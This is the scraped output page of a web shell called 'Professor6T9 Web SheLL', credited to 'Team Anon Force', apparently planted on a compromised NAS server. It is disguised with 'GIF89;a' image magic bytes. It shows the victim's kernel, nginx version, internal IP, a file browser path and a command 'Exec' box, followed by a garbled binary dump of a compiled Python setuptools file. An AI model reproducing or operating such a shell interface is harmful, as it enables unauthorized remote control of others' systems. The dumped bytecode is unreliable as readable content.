GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
_distutils
/
command
/
__pycache__
[ HOME ]
Exec
Submit
install_lib.cpython-38.pyc
U �}�h� � @ sL d Z ddlZddlZddlZddlmZ ddlmZ dZ G dd� de�Z dS ) zkdistutils.command.install_lib Implements the Distutils 'install_lib' command (install all Python modules).� N� )�Command)�DistutilsOptionErrorz.pyc @ s� e Zd ZdZdddddddgZd d dgZdd iZd d� Zdd� Zdd� Z dd� Z dd� Zdd� Zdd� Z dd� Zdd� Zdd � Zd!S )"�install_libz7install all Python modules (extensions and pure Python))zinstall-dir=�dzdirectory to install to)z build-dir=�bz'build directory (where to install from))�force�fz-force installation (overwrite existing files))�compile�czcompile .py to .pyc [default])� no-compileNzdon't compile .py files)z optimize=�Ozlalso compile with optimization: -O1 for "python -O", -O2 for "python -OO", and -O0 to disable [default: -O0])� skip-buildNzskip the build stepsr r r r c C s( d | _ d | _d| _d | _d | _d | _d S )NF)�install_dir� build_dirr r �optimize� skip_build��self� r �P/tmp/pip-target-k_nuic9h/lib/python/setuptools/_distutils/command/install_lib.py�initialize_options5 s zinstall_lib.initialize_optionsc C s� | � ddddddd� | jd kr&d| _| jd kr6d | _t| jt�s�zt| j�| _| jd kr^t�W n ttfk r� td��Y nX d S )N�install)� build_libr )r r )r r )r r )r r )r r TF)r � r zoptimize must be 0, 1, or 2)�set_undefined_optionsr r � isinstance�int�AssertionError� ValueErrorr r r r r �finalize_options>